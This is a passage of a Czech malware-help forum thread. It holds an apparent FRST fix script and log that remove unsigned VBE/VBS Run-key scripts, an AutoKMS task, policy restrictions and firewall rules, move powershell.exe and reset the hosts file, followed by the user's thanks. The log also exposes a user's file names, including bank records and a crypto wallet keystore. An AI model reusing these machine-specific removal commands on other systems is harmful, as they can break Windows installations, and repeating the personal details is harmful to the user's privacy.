AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]
FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
C:\WINDOWS\AutoKMS

EmptyTemp:
Hosts:
End
*****************

Processes closed successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Pending) => subkey with invalid name -> removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Synced) => subkey with invalid name -> removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Syncing) => subkey with invalid name -> removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw => removed successfully
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Pending) => subkey with invalid name -> removed successfully
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Synced) => subkey with invalid name -> removed successfully
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Syncing) => subkey with invalid name -> removed successfully
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
HKLM\Software\Classes\Drive\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
C:\ProgramData\TEMP => ":0888F409" ADS removed successfully
C:\ProgramData\TEMP => ":3440EB47" ADS removed successfully
C:\ProgramData\TEMP => ":66633281" ADS removed successfully
C:\ProgramData\TEMP => ":93433455" ADS removed successfully
C:\Users\IRENA-PC\Downloads => ":com.dropbox.attrs" ADS could not remove.
C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\102394978_1.jpg => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\ChromeSetup.exe => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\cpg15x => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\desktop (New).ini => ":com.dropbox.attrs" ADS could not remove.
C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\index.php => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\JDownloader => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4 => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Mall rádio.PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\PA2018040002.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\plna_moc.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Plná moc.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\priloha1.PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\readme.txt => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Spořitelna.png => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Telegram Desktop => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Ulozto => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\wordpress => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\__MACOSX => ":com.dropbox.attrs" ADS removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe" => removed successfully
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe => moved successfully
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\SunJavaUpdateSched" => removed successfully
"HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Value" => removed successfully
"HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Microsoft Software Essentials" => removed successfully
C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
C:\ProgramData\NTUSER.pol => moved successfully
HKLM\SOFTWARE\Policies\Mozilla => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{114D61BE-723E-4720-9A0D-15FEB326AC4B}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{114D61BE-723E-4720-9A0D-15FEB326AC4B}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CD7FA012-E446-4088-B57D-E33EE8969426}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CD7FA012-E446-4088-B57D-E33EE8969426}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{DEA268E2-12DD-4984-AB28-F8F89AFCFFCA}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DEA268E2-12DD-4984-AB28-F8F89AFCFFCA}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{EEA50510-8C7D-45F8-BEF4-240855B8A812}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EEA50510-8C7D-45F8-BEF4-240855B8A812}" => removed successfully
C:\WINDOWS\System32\Tasks\AutoKMS => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoKMS" => removed successfully
"C:\WINDOWS\AutoKMS" => not found
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 10772480 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 221777092 B
Java, Flash, Steam htmlcache => 1080 B
Windows/system/drivers => 209262 B
Edge => 33792 B
Chrome => 166347126 B
Brave => 322395 B
Firefox => 10614505 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 34550 B
IRENA-PC => 7177522 B

RecycleBin => 0 B
EmptyTemp: => 398 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 20:16:47 ====

Rudy
Site Admin
Posts: 118371
Registered: 30 Oct 2003 13:42
Location: Plzeň

Re: Please check my log

#14 Post by Rudy »

Deleted. Has anything changed?

chenny
Visitor
Posts: 36
Registered: 06 Sep 2007 09:50

Re: Please check my log

#15 Post by chenny »

The PC looks fine. Thank you very much for your help and your time :)

Locked